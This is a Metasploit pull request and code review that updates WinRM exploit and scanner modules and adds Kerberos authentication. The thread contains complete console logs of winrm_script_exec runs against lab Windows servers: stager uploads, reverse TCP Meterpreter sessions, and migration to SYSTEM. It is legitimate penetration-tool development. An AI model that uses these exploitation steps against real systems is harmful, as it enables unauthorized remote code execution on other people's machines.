### PR TITLE
Fix various WinRM modules

### LINKED ISSUE #11456: Review exploit/windows/winrm/winrm_script_exec
Review the [exploit/windows/winrm/winrm_script_exec module](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/winrm/winrm_script_exec.rb). This module is old and hasn't been maintained.

Why is `CmdStager::Flavor` deregistered, and instead a `ForceVBS` option used + a million other questions.

### PR DESCRIPTION
**Pull request by smashery**
This PR fixes #11456.

Several WinRM modules only used to work against unencrypted services, and had not had the Kerberos auth features added. This PR changes that, both for the `winrm_script_exec` module mentioned in #11456, as well as `winrm_wql`.

## Behaviour changes

In addition to getting it working again, I changed two things - open to discussion about these.

Firstly, rather than setting the global Execution Policy (which lowers the security of the target system), I use the command line parameter `-executionPolicy`, which sets it on a per-run basis.

Secondly, I changed the syntax of the NAMESPACE parameter to be more in-line with normal usage (`root/cimv2` rather than `/root/cimv2`). I did this mostly because the Ruby WinRM module expects it without the leading slash - but I could manually remove that for backwards compatibility if that'd be preferable.

I also fixed what seemed to be a bug in the use of x86 payloads: they were looking for the string value `"x86"` in the payload name; but on Windows, the x86 is implied (vs x64, which is explicitly specified). So x86 payloads were never actually detected, and thus never ran on x64.

To get this working with bind shells, I made the final call to the WinRM shell onto a background thread (which will terminate once the `Start-Sleep` finishes); otherwise it just hangs until the timeout ends, but never starts the bind handler. Not sure if this would have been a bug before - I think so, but I was never able to actually get the module running without erroring.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use winrm_script_exec`
- [ ] Verify it works on an old system with PowerShell v1 (should revert to VBS stager)
- [ ] Verify `FORCE_VBS` setting works
- [ ] Verify different payload types (x64, x86, bind and reverse)
- [ ] Verify it works with Kerberos auth
- [ ] `use winrm_wql`
- [ ] Verify it can perform WQL queries
- [ ] Verify it works with Kerberos auth
- [ ] `use winrm_auth_methods`
- [ ] Verify this module still works

### CODE REVIEW

**Comment by adfoster-r7** [comment]
<details>
<summary>:green_circle: winrm_script_exec - windows server 2008 without powershell</summary>

```
msf6 exploit(windows/winrm/winrm_script_exec) > rerun username=Administrator password=p4$$w0rd rhosts=192.168.123.132 rport=80
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] Checking for Powershell 2.0
[-] Powershell is not installed
[*] Command Stager progress -   2.01% done (2046/101936 bytes)
[*] Command Stager progress -   4.01% done (4092/101936 bytes)
[*] Command Stager progress -   6.02% done (6138/101936 bytes)
[*] Command Stager progress -   8.03% done (8184/101936 bytes)
[*] Command Stager progress -  10.04% done (10230/101936 bytes)
[*] Command Stager progress -  12.04% done (12276/101936 bytes)
[*] Command Stager progress -  14.05% done (14322/101936 bytes)
[*] Command Stager progress -  16.06% done (16368/101936 bytes)
[*] Command Stager progress -  18.06% done (18414/101936 bytes)
[*] Command Stager progress -  20.07% done (20460/101936 bytes)
[*] Command Stager progress -  22.08% done (22506/101936 bytes)
[*] Command Stager progress -  24.09% done (24552/101936 bytes)
[*] Command Stager progress -  26.09% done (26598/101936 bytes)
[*] Command Stager progress -  28.10% done (28644/101936 bytes)
[*] Command Stager progress -  30.11% done (30690/101936 bytes)
[*] Command Stager progress -  32.11% done (32736/101936 bytes)
[*] Command Stager progress -  34.12% done (34782/101936 bytes)
[*] Command Stager progress -  36.13% done (36828/101936 bytes)
[*] Command Stager progress -  38.14% done (38874/101936 bytes)
[*] Command Stager progress -  40.14% done (40920/101936 bytes)
[*] Command Stager progress -  42.15% done (42966/101936 bytes)
[*] Command Stager progress -  44.16% done (45012/101936 bytes)
[*] Command Stager progress -  46.16% done (47058/101936 bytes)
[*] Command Stager progress -  48.17% done (49104/101936 bytes)
[*] Command Stager progress -  50.18% done (51150/101936 bytes)
[*] Command Stager progress -  52.19% done (53196/101936 bytes)
[*] Command Stager progress -  54.19% done (55242/101936 bytes)
[*] Command Stager progress -  56.20% done (57288/101936 bytes)
[*] Command Stager progress -  58.21% done (59334/101936 bytes)
[*] Command Stager progress -  60.21% done (61380/101936 bytes)
[*] Command Stager progress -  62.22% done (63426/101936 bytes)
[*] Command Stager progress -  64.23% done (65472/101936 bytes)
[*] Command Stager progress -  66.24% done (67518/101936 bytes)
[*] Command Stager progress -  68.24% done (69564/101936 bytes)
[*] Command Stager progress -  70.25% done (71610/101936 bytes)
[*] Command Stager progress -  72.26% done (73656/101936 bytes)
[*] Command Stager progress -  74.26% done (75702/101936 bytes)
[*] Command Stager progress -  76.27% done (77748/101936 bytes)
[*] Command Stager progress -  78.28% done (79794/101936 bytes)
[*] Command Stager progress -  80.29% done (81840/101936 bytes)
[*] Command Stager progress -  82.29% done (83886/101936 bytes)
[*] Command Stager progress -  84.30% done (85932/101936 bytes)
[*] Command Stager progress -  86.31% done (87978/101936 bytes)
[*] Command Stager progress -  88.31% done (90024/101936 bytes)
[*] Command Stager progress -  90.32% done (92070/101936 bytes)
[*] Command Stager progress -  92.33% done (94116/101936 bytes)
[*] Command Stager progress -  94.34% done (96162/101936 bytes)
[*] Command Stager progress -  96.34% done (98208/101936 bytes)
[*] Command Stager progress -  98.35% done (100252/101936 bytes)
[*] Command Stager progress - 100.00% done (101936/101936 bytes)
[*] Sending stage (175686 bytes) to 192.168.123.132
[*] Session ID 2 (192.168.123.1:4444 -> 192.168.123.132:53889) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'
[*] Current session process is dinfr.exe (4220) as: DEMO\Administrator
[*] Session is Admin but not System.
[*] Will attempt to migrate to specified System level process.
[*] Trying services.exe (552)
[+] Successfully migrated to services.exe (552) as: NT AUTHORITY\SYSTEM
[*] Meterpreter session 2 opened (192.168.123.1:4444 -> 192.168.123.132:53889) at 2022-12-12 20:12:26 +0000

meterpreter > 

```
</details>


<details>
<summary>:green_circle: scanner/winrm/winrm_wql - windows server 2008 without powershell</summary>

```
msf6 auxiliary(scanner/winrm/winrm_wql) > rerun username=Administrator password=p4$$w0rd rhosts=192.168.123.132 rport=80
[*] Reloading module...

[+] Select Name,Status from Win32_Service (192.168.123.132)
=======================================================

 name                            status
 ----                            ------
 ALG                             OK
 AeLookupSvc                     OK
 AppMgmt                         OK
 Appinfo                         OK
 AudioEndpointBuilder            OK
 Audiosrv                        OK
 BFE                             OK
 BITS                            OK
 Browser                         OK
 COMSysApp                       OK
 CertPropSvc                     OK
 CryptSvc                        OK
 CscService                      OK
 DFSR                            OK
 DNS                             OK
 DPS                             OK
 DcomLaunch                      OK
 Dfs                             OK
 Dhcp                            OK
 Dnscache                        OK
 EapHost                         OK
 EventLog                        OK
 EventSystem                     OK
 FCRegSvc                        OK
 FDResPub                        OK
 IKEEXT                          OK
 IPBusEnum                       OK
 IsmServ                         OK
 KeyIso                          OK
 KtmRm                           OK
 LanmanServer                    OK
 LanmanWorkstation               OK
 MMCSS                           OK
 MSDTC                           OK
 MSiSCSI                         OK
 MpsSvc                          OK
 NTDS                            OK
 Netlogon                        OK
 Netman                          OK
 NlaSvc                          OK
 NtFrs                           OK
 PlugPlay                        OK
 PolicyAgent                     OK
 ProfSvc                         OK
 ProtectedStorage                OK
 RSoPProv                        OK
 RasAuto                         OK
 RasMan                          OK
 RemoteAccess                    OK
 RemoteRegistry                  OK
 RpcLocator                      OK
 RpcSs                           OK
 SCPolicySvc                     OK
 SCardSvr                        OK
 SENS                            OK
 SLUINotify                      OK
 SMut                            OK
 SNMPTRAP                        OK
 SSDPSRV                         OK
 SamSs                           OK
 Schedule                        OK
 SessionEnv                      OK
 SharedAccess                    OK
 ShellHWDetection                OK
 Spooler                         OK
 SstpSvc                         OK
 SysMain                         OK
 TBS                             OK
 THREADORDER                     OK
 TapiSrv                         OK
 TermService                     OK
 Themes                          OK
 TrkWks                          OK
 TrustedInstaller                OK
 UI0Detect                       OK
 UmRdpService                    OK
 UxSms                           OK
 VSS                             OK
 W32Time                         OK
 WPDBusEnum                      OK
 WcsPlugInService                OK
 WdiServiceHost                  OK
 WdiSystemHost                   OK
 Wecsvc                          OK
 WerSvc                          OK
 WinHttpAutoProxySvc             OK
 WinRM                           OK
 Winmgmt                         OK
 clr_optimization_v2.0.50727_32  OK
 dot3svc                         OK
 fdPHost                         OK
 gpsvc                           OK
 hidserv                         OK
 hkmsvc                          OK
 iphlpsvc                        OK
 kdc                             OK
 lltdsvc                         OK
 lmhosts                         OK
 lwfm                            OK
 msiserver                       OK
 napagent                        OK
 netprofm                        OK
 nsi                             OK
 pla                             OK
 sacsvr                          OK
 seclogon                        OK
 slsvc                           OK
 swprv                           OK
 upnphost                        OK
 vds                             OK
 wercplsupport                   OK
 wmiApSrv                        OK
 wuauserv                        OK
 wudfsvc                         OK
```
</details>

<details>
<summary>:green_circle: scanner/winrm/winrm_auth_methods - windows server 2008 without powershell</summary>

```
msf6 auxiliary(scanner/winrm/winrm_auth_methods) > rerun username=Administrator password=p4$$w0rd rhosts=192.168.123.132 rport=80 wql='select 1 from abc'
[*] Reloading module...

[+] 192.168.123.132:80: Negotiate protocol supported
[+] 192.168.123.132:80: Kerberos protocol supported
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
</details>


---

<details>
<summary>:green_circle: winrm_script_exec - windows server 2016 - x86</summary>

```
msf6 exploit(windows/winrm/winrm_script_exec) > rerun username=Administrator password=p4$$w0rd rhosts=192.168.123.13
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] Checking for Powershell 2.0
[-] You selected an x86 payload for an x64 target...trying to run in compat mode
[*] Grabbing %TEMP%
[*] Uploading powershell script to C:\Users\ADMINI~1\AppData\Local\Temp\IVYhhWIT.ps1 (This may take a few minutes)...
[*] Attempting to execute script...
[*] Sending stage (175686 bytes) to 192.168.123.13
[*] Session ID 3 (192.168.123.1:4444 -> 192.168.123.13:59107) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'
[*] Current session process is powershell.exe (2316) as: ADF3\Administrator
[*] Session is Admin but not System.
[*] Will attempt to migrate to specified System level process.
[-] Could not migrate to services.exe.
[-] Could not migrate to wininit.exe.
[*] Trying svchost.exe (860)
[+] Successfully migrated to svchost.exe (860) as: NT AUTHORITY\SYSTEM
[*] Meterpreter session 3 opened (192.168.123.1:4444 -> 192.168.123.13:59107) at 2022-12-12 20:18:55 +0000

meterpreter >

```
</details>

<details>
<summary>:green_circle: winrm_script_exec - windows server 2016 - x64</summary>

```
msf6 exploit(windows/winrm/winrm_script_exec) > rerun username=Administrator password=p4$$w0rd rhosts=192.168.123.13
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] Checking for Powershell 2.0
[*] Grabbing %TEMP%
[*] Uploading powershell script to C:\Users\ADMINI~1\AppData\Local\Temp\dnDoTgDN.ps1 (This may take a few minutes)...
[*] Attempting to execute script...
[*] Sending stage (200774 bytes) to 192.168.123.13
[*] Session ID 4 (192.168.123.1:4444 -> 192.168.123.13:59109) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'
[*] Current session process is powershell.exe (2364) as: ADF3\Administrator
[*] Session is Admin but not System.
[*] Will attempt to migrate to specified System level process.
[-] Could not migrate to services.exe.
[-] Could not migrate to wininit.exe.
[*] Trying svchost.exe (860)
[+] Successfully migrated to svchost.exe (860) as: NT AUTHORITY\SYSTEM
[*] Meterpreter session 4 opened (192.168.123.1:4444 -> 192.168.123.13:59109) at 2022-12-12 20:19:30 +0000

meterpreter >
```
</details>


<details>
<summary>:green_circle: scanner/winrm/winrm_wql - windows server 2008 without powershell</summary>

```
msf6 auxiliary(scanner/winrm/winrm_wql) > rerun username=Administrator password=p4$$w0rd rhosts=192.168.123.13
[*] Reloading module...

[+] Select Name,Status from Win32_Service (192.168.123.13)
======================================================

 name                                      status
 ----                                      ------
 ADWS                                      OK
 AJRouter                                  OK
 etc
```
</details>

<details>
<summary>:green_circle: scanner/winrm/winrm_auth_methods - windows server 2008 without powershell</summary>

```
msf6 auxiliary(scanner/winrm/winrm_auth_methods) > rerun username=Administrator password=p4$$w0rd rhosts=192.168.123.13
[*] Reloading module...

[+] 192.168.123.13:5985: Negotiate protocol supported
[+] 192.168.123.13:5985: Kerberos protocol supported
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
</details>

File: modules/exploits/windows/winrm/winrm_script_exec.rb [hunk 1]
```diff
@@ -2,236 +2,219 @@
...
 
-  def execute_command(cmd,opts)
+  # Run the WinRM command
+  def winrm_run_cmd(command)
+    shell.run(command)
+  end
+
+  # Run the WinRM command on a background thread
+  def winrm_run_cmd_async(command)
+    Thread.new { winrm_run_cmd(command); self.shell.close }
```
Comment (adfoster-r7) [inline modules/exploits/windows/winrm/winrm_script_exec.rb:84]: I think we should swap this over to a framework thread with `framework.threads.spawn` -  so we can kill it 👀 

It also looks like that this thread doesn't end when the command completes, as I wired this up locally and the thread sticks around after killing the session:

```diff
[*] exec: git diff


diff --git a/modules/exploits/windows/winrm/winrm_script_exec.rb b/modules/exploits/windows/winrm/winrm_script_exec.rb
index c22bd960e7..07176242d2 100644
--- a/modules/exploits/windows/winrm/winrm_script_exec.rb
+++ b/modules/exploits/windows/winrm/winrm_script_exec.rb
@@ -81,7 +81,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # Run the WinRM command on a background thread
   def winrm_run_cmd_async(command)
-    Thread.new { winrm_run_cmd(command); self.shell.close }
+    # TODO: probably needs a better user-facing name
+    framework.threads.spawn("winrm_run_cmd_async", false) do
+      $stderr.puts 'before'
+      winrm_run_cmd(command)
+      $stderr.puts 'after'
+      self.shell.close
+    end
   end
 
   # Execute a command on the WinRM shell (called via the VBS Stager)
```

Win 2008 r2 output:

```
msf6 exploit(windows/winrm/winrm_script_exec) > rerun username=Administrator password=p4$$w0rd rhosts=192.168.123.132 rport=80
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] Checking for Powershell 2.0
[-] Powershell is not installed
[*] Command Stager progress -   2.01% done (2046/101936 bytes)
... etc ...
[*] Command Stager progress -  98.35% done (100252/101936 bytes)
before
[*] Command Stager progress - 100.00% done (101936/101936 bytes)
[*] Sending stage (175686 bytes) to 192.168.123.132
[*] Session ID 1 (192.168.123.1:4444 -> 192.168.123.132:60025) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'
[*] Current session process is knhgv.exe (2612) as: DEMO\Administrator
[*] Session is Admin but not System.
[*] Will attempt to migrate to specified System level process.
[*] Trying services.exe (552)
[+] Successfully migrated to services.exe (552) as: NT AUTHORITY\SYSTEM
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.132:60025) at 2022-12-12 20:55:11 +0000

meterpreter > background
[*] Backgrounding session 1...
semsf6 exploit(windows/winrm/winrm_script_exec) > sessions

Active sessions
===============

  Id  Name  Type                     Information                           Connection
  --  ----  ----                     -----------                           ----------
  1         meterpreter x86/windows  DEMO\Administrator @ WIN-0P19ULL2NB6  192.168.123.1:4444 -> 192.168.123.132:60025 (192.168.123.132)

msf6 exploit(windows/winrm/winrm_script_exec) > sessions -K
```

And we can see the thread is still around afterwards:

```
msf6 exploit(windows/winrm/winrm_script_exec) > threads

Background Threads
==================

   ID  Status  Critical  Name                 Started
   --  ------  --------  ----                 -------
   0   sleep   True      SessionScheduler-1   2022-12-12 20:53:39 +0000
   1   sleep   True      SessionScheduler-2   2022-12-12 20:53:39 +0000
   2   sleep   True      SessionScheduler-3   2022-12-12 20:53:39 +0000
   3   sleep   True      SessionScheduler-4   2022-12-12 20:53:39 +0000
   4   sleep   True      SessionScheduler-5   2022-12-12 20:53:39 +0000
   5   sleep   True      SessionManager       2022-12-12 20:53:39 +0000
   6   sleep   False     winrm_run_cmd_async  2022-12-12 20:55:05 +0000
```

File: modules/exploits/windows/winrm/winrm_script_exec.rb [hunk 2]
```diff
@@ -2,236 +2,219 @@
...
-  def valid_login?
-    data = winrm_wql_msg("Select Name,Status from Win32_Service")
-    resp = send_winrm_request(data)
-    unless resp.code == 200
-      return false
-    end
     return true
   end
+
+  # The WinRM Shell object
```
Comment (adfoster-r7) [inline modules/exploits/windows/winrm/winrm_script_exec.rb:215]:
```suggestion
  # @return [WinRM::Shells::Cmd] The WinRM Shell object
```

File: modules/exploits/windows/winrm/winrm_script_exec.rb (hunk 1 above)
Comment (adfoster-r7) [reply modules/exploits/windows/winrm/winrm_script_exec.rb:84]: Does this need a finally/ensure ruby block around the `self.shell.close` line to catch unexpected exceptions and cleanup properly? 🤔

Would also have to double check the semantics of the thread manager's `framework.threads.kill` API here now that I think about it, as I'm not sure if it violently kills threads or not before they have a chance to cleanup.

Comment (smashery) [reply modules/exploits/windows/winrm/winrm_script_exec.rb]: Thanks - I've changed that to use the framework's thread mechanism. 

In terms of the background thread hanging around - it will _eventually_ die, though this is controlled by the server, not us. The `Start-Sleep` in the actual exploit is the kicker here: if you don't let WinRM's powershell process hang around for a short while, then it won't have time to migrate. I believe migration is required as part of this module, because otherwise, as soon as the WinRM connection dies (which I believe happens automatically if not maintained), then you lose your shell. So there is a sleep in there to allow it to do the migration.

Once the sleep finishes, the remote script finishes, and the thread dies of its own volition.

Prior to my changes, there were 10 minutes allowed for the migration. I changed it down to 5 minutes, but given it should take one or two seconds, I've modified this down further to 20 seconds. You should see the thread die after that.

Ideally, we'd change this to be a `WaitForSingleObject` kind of thing, but that seemed outside the scope of this change.

File: lib/msf/core/exploit/remote/winrm.rb [hunk 3]
```diff
@@ -26,14 +28,89 @@ def initialize(info = {})
       ], self.class
     )
 
+    register_advanced_options(
+      [
+        OptEnum.new('WinrmAuth', [true, 'The Authentication mechanism to use', Msf::Exploit::Remote::AuthOption::AUTO, Msf::Exploit::Remote::AuthOption::WINRM_OPTIONS]),
+        OptString.new('WinrmRhostname', [false, 'The rhostname which is required for kerberos']),
+        OptAddress.new('DomainControllerRhost', [false, 'The resolvable rhost for the Domain Controller']),
```
Comment (cdelafuente-r7) [inline lib/msf/core/exploit/remote/winrm.rb:35]: Unless I'm missing something, I don't think there is any validation for these options when `WinrmAuth` is set to `kerberos`. I think it's a good idea to have some, but It might not be possible for WinRM?

Other protocols like SMB validate like this:

https://github.com/rapid7/metasploit-framework/blob/b01720dcbab30535a7009d533bd1d6b33fc50e37/modules/auxiliary/scanner/smb/smb_login.rb#L75-L78

**Review by cdelafuente-r7 — COMMENTED** [review]
Thanks @smashery ! I just left a couple of comments for you to review when you get a chance. Otherwise, it looks good to me. I tested the 3 modules and everything works perfectly with user/password and kerberos authentications. I also tested x86/x64 payloads with `exploits/windows/winrm/winrm_script_exec`.

File: lib/msf/core/exploit/remote/winrm.rb [hunk 4]
```diff
@@ -26,14 +28,89 @@ def initialize(info = {})
...
+  # Sets up a connection to a WinRM server, based on the datastore parameters
+  # May use NTLM or Kerberos auth, depending on the params
+  # @return [Net::MsfWinRM::RexWinRMConnection] Connection to the WinRM server
+  def create_winrm_connection
+    rhost = datastore['RHOST']
+    rport = datastore['RPORT']
+    uri = datastore['URI']
+    ssl = datastore['SSL']
+    schema = ssl ? 'https' : 'http'
+    endpoint = "#{schema}://#{rhost}:#{rport}#{uri}"
```
[the remark this answers is not in the document]
Comment (smashery) [reply lib/msf/core/exploit/remote/winrm.rb:53]: Nice call - thanks.

File: lib/msf/core/exploit/remote/winrm.rb (hunk 3 above)
Comment (smashery) [reply lib/msf/core/exploit/remote/winrm.rb:35]: There was a similar check in one of the actual exploit modules (the `winrm_cmd` one); but the validation was incomplete in another, and entirely missing from 2 more. I've centralised it in this mixin module, and utilised it in all four.

**Review by cdelafuente-r7 — COMMENTED** [review]
Thanks @smashery for updating this. I just found an issue with the `auxiliary/scanner/winrm/winrm_wql` module. Apparently, a call to `super` is required in the `run` method. I'll add it myself, no worry. Other than that, everything looks good. I'll go ahead and land it.

### Example output

<details>
<summary>Windows Server 2008 with Powershell v1</summary>

```
msf6 exploit(windows/winrm/winrm_script_exec) > exploit rhosts=192.168.10.13 lhost=192.168.10.1 username=administrator password=123456 rport=80

[*] Started reverse TCP handler on 192.168.10.1:4444
[*] Checking for Powershell 2.0
[-] The target is running an older version of Powershell
[*] Command Stager progress -   2.01% done (2046/101936 bytes)
[*] Command Stager progress -   4.01% done (4092/101936 bytes)
...
[*] Command Stager progress -  98.35% done (100252/101936 bytes)
[*] Command Stager progress - 100.00% done (101936/101936 bytes)
[*] Sending stage (175686 bytes) to 192.168.10.13
[*] Session ID 1 (192.168.10.1:4444 -> 192.168.10.13:49157) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'
[*] Current session process is ajmmf.exe (3896) as: WIN-M6JC587VWFF\Administrator
[*] Session is Admin but not System.
[*] Will attempt to migrate to specified System level process.
[*] Trying services.exe (608)
[+] Successfully migrated to services.exe (608) as: NT AUTHORITY\SYSTEM
[*] Meterpreter session 1 opened (192.168.10.1:4444 -> 192.168.10.13:49157) at 2023-01-03 21:05:13 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-M6JC587VWFF
OS              : Windows 2008 (6.0 Build 6002, Service Pack 2).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
```

</details>

<details>
<summary>Windows Server 2019 with FORCE_VBS</summary>

```
msf6 exploit(windows/winrm/winrm_script_exec) > exploit rhosts=192.168.10.17 lhost=192.168.10.1 username=administrator password=123456 FORCE_VBS=true

[*] Started reverse TCP handler on 192.168.10.1:4444
[*] User selected the FORCE_VBS option
[*] Command Stager progress -   2.01% done (2046/101936 bytes)
[*] Command Stager progress -   4.01% done (4092/101936 bytes)
...
[*] Command Stager progress -  98.35% done (100252/101936 bytes)
[*] Command Stager progress - 100.00% done (101936/101936 bytes)
[*] Sending stage (175686 bytes) to 192.168.10.17
[*] Session ID 3 (192.168.10.1:4444 -> 192.168.10.17:57160) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'
[*] Current session process is mzwqz.exe (4356) as: NEWLAB\Administrator
[*] Session is Admin but not System.
[*] Will attempt to migrate to specified System level process.
[-] Could not migrate to services.exe.
[-] Could not migrate to wininit.exe.
[*] Trying svchost.exe (844)
[+] Successfully migrated to svchost.exe (844) as: NT AUTHORITY\SYSTEM
[*] Meterpreter session 3 opened (192.168.10.1:4444 -> 192.168.10.17:57160) at 2023-01-03 21:09:28 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : NEWDC01
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : NEWLAB
Logged On Users : 8
Meterpreter     : x64/windows
```

</details>

<details>
<summary>Windows Server 2019 with x86 payload</summary>

```
msf6 exploit(windows/winrm/winrm_script_exec) > exploit rhosts=192.168.10.17 lhost=192.168.10.1 username=administrator password=123456

[*] Started reverse TCP handler on 192.168.10.1:4444
[*] Checking for Powershell 2.0
[-] You selected an x86 payload for an x64 target...trying to run in compat mode
[*] Grabbing %TEMP%
[*] Uploading powershell script to C:\Users\ADMINI~1\AppData\Local\Temp\OcYGORKr.ps1 (This may take a few minutes)...
[*] Attempting to execute script...
[*] Sending stage (175686 bytes) to 192.168.10.17
[*] Session ID 5 (192.168.10.1:4444 -> 192.168.10.17:57172) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'
[*] Current session process is powershell.exe (7528) as: NEWLAB\Administrator
[*] Session is Admin but not System.
[*] Will attempt to migrate to specified System level process.
[-] Could not migrate to services.exe.
[-] Could not migrate to wininit.exe.
[*] Trying svchost.exe (844)
[+] Successfully migrated to svchost.exe (844) as: NT AUTHORITY\SYSTEM
[*] Meterpreter session 5 opened (192.168.10.1:4444 -> 192.168.10.17:57172) at 2023-01-03 21:13:31 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : NEWDC01
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : NEWLAB
Logged On Users : 8
Meterpreter     : x64/windows
```

</details>

<details>
<summary>Windows Server 2019 with Kerberos authentication</summary>

```
msf6 exploit(windows/winrm/winrm_script_exec) > exploit rhosts=192.168.10.17 lhost=192.168.10.1 username=administrator password=123456 domain=newlab.local WinrmAuth=kerberos WinrmRhostname=NEWDC01 DomainControllerRhost=192.168.10.17

[*] Started reverse TCP handler on 192.168.10.1:4444
[*] Checking for Powershell 2.0
[*] 192.168.10.17:88 - Using cached credential for http/NEWDC01@NEWLAB.LOCAL administrator@NEWLAB.LOCAL
[+] 192.168.10.17:88 - Received AP-REQ. Extracting session key...
[*] Grabbing %TEMP%
[*] Uploading powershell script to C:\Users\ADMINI~1\AppData\Local\Temp\TmswapgG.ps1 (This may take a few minutes)...
[*] Attempting to execute script...
[*] Sending stage (200774 bytes) to 192.168.10.17
[*] Session ID 6 (192.168.10.1:4444 -> 192.168.10.17:57183) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'
[*] Current session process is powershell.exe (6296) as: NEWLAB\Administrator
[*] Session is Admin but not System.
[*] Will attempt to migrate to specified System level process.
[-] Could not migrate to services.exe.
[-] Could not migrate to wininit.exe.
[*] Trying svchost.exe (844)
[+] Successfully migrated to svchost.exe (844) as: NT AUTHORITY\SYSTEM
[*] Meterpreter session 6 opened (192.168.10.1:4444 -> 192.168.10.17:57183) at 2023-01-03 21:18:18 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : NEWDC01
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : NEWLAB
Logged On Users : 8
Meterpreter     : x64/windows
```

</details>

File: modules/auxiliary/scanner/winrm/winrm_wql.rb [hunk 5]
```diff
@@ -3,60 +3,43 @@
...
-        OptString.new('NAMESPACE', [true, 'The WMI namespace to use for queries', '/root/cimv2/'])
-      ])
+        OptString.new('WQL', [ true, 'The WQL query to run', 'Select Name,Status from Win32_Service' ]),
+        OptString.new('NAMESPACE', [true, 'The WMI namespace to use for queries', 'root/cimv2'])
+      ]
+    )
   end
 
+  def run
+    check_winrm_parameters
```
[the remark this answers is not in the document]
Comment (cdelafuente-r7) [reply modules/auxiliary/scanner/winrm/winrm_wql.rb:34]: Addressed in 9f869f5a110d8036e7a7a48dc8d9394b65f6ed5e

**Comment by cdelafuente-r7** [comment]
# Release Notes

This updates several WinRM modules that were only used to work against unencrypted services. This also add support to Kerberos authentication for all of them.
